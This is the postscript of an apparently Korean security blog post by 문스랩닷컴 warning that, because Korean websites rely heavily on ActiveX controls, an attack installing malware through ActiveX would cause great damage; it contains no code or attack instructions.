                  PS: 국내에서는 웹 사이트에서 Active-X 컨트롤을 자주 사용합니다. 만약 Active-X 형태로 동작하는 악성코드를 다운로드하여 설치하는(감염시키는) 공격 형태가 발생한다면 그 피해는 엄청날 것으로 예상됩니다.
                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus


                    Web Analytics Blogs Directory